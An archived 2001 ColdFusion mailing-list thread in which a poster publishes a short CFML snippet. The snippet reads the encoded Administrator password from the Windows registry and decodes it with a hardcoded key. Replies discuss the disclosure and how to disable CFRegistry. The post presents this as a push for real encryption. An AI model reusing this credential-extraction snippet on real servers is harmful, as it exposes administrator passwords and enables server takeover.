RE: Finding the CF Administrator password

Sat, 10 Mar 2001 07:42:09 -0800 

How does one disable CFRegistry?

Thanks!

John

-----Original Message-----
From: CF [mailto:[EMAIL PROTECTED]] 
Sent: Saturday, March 10, 2001 10:48 AM
To: CF-Talk
Subject: Re: Finding the CF Administrator password


Yeah .. someone sent me the key a little earlier and it worked like a
charm. Actually, this other peson also showed me how to find the key to
begin with ... it's amazingly simple.  I don't see why you should be
flamed .. people should not have CFRegistry active on a machine where
they wouldn't want people getting in and doing stuff like this anyway.
This is just another great example of why ;)

Todd Ashworth
Web Application Developer
Network Administrator

Saber Corporation
314 Oakland Ave.
Rock Hill, SC 29730
(803) 327-0137 [111] (p)
(803) 328-2868 (f)

----- Original Message -----
From: "Dain Anderson" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Saturday, March 10, 2001 12:07 AM
Subject: Re: Finding the CF Administrator password


> Todd,
>
> It's very easy to retrieve the admin password, and I'm sure I will get

> flamed for showing this, but what the hell:
>
> <CFSET CFKey = "4p0L@r1$">
>
> <CFREGISTRY ACTION=GET
>
>
Branch="HKEY_LOCAL_MACHINE\SOFTWARE\Allaire\ColdFusion\CurrentVersion\Se
rver
> "
>       Entry="AdminPassword"
>       Variable="AdminPassword">
>
> <CFOUTPUT>
>       Registry Password: #CFusion_Decrypt(AdminPassword, CFKey)# 
> </CFOUTPUT>
>
> The key to decrypt it spells "4 Polaris" (Allaire inside joke?) -- 
> this isn't my doing; rather, I was sent this from an anonymous source 
> via the [EMAIL PROTECTED] address. I hope this will show Allaire 
> and ISPs that there is a need for encryption, not encoding, for things

> such as this. I
am
> against template encryption personally, but the administrator feature
should
> have much better security. We live and learn, strive and yearn.
>
> Dain Anderson
> Caretaker, CF Comet
> http://www.cfcomet.com/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Reply via email to